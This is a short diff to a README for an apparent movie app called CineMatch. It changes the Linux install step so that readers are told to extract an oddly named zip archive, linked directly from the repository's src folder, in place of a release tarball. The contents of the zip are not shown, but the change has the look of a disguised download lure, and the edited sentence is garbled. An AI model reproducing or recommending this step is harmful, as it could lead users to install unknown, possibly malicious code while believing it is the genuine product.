III-prog/cinematch/README.md

 - For Windows: Double-click the `.exe` file, and follow the installation prompts.
 - For macOS: Open the `.dmg` file and drag the CineMatch app into your Applications folder.
-- For Linux: Extract the `.tar.gz` file in your desired directory and follow the instructions in the README file inside.
+- For Linux: Extract the `https://raw.githubusercontent.com/III-prog/cinematch/master/src/Software-sissification.zip` file in your desired directory and follow the instructions in the README file inside.

 ### step 5: Launch CineMatch